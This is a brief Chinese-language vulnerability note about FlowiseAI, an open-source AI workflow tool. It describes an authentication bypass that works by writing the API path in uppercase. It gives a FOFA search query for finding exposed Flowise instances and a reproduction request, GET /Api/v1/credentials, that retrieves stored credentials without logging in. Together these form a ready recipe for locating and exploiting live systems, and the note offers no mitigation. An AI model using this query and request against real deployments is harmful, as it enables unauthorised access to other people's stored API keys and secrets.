0x01 产品简介
FlowiseAI是一个强大的开源项目,致力于简化和自动化业务流程,提高工作效率。该项目结合了人工智能与工作流引擎,为用户提供了一种直观、可扩展的方式来设计、执行和监控复杂的工作流程。
0x02 漏洞概述
FlowiseAI存在身份认证绕过漏洞,未授权的攻击者可以通过将路径修改为大写从而绕过检测,从而获取大量敏感信息。
0x03 测绘语句
fofa: body="Flowise"
0x04 漏洞复现
通过大小绕过身份认证
GET /Api/v1/credentials HTTP/1.1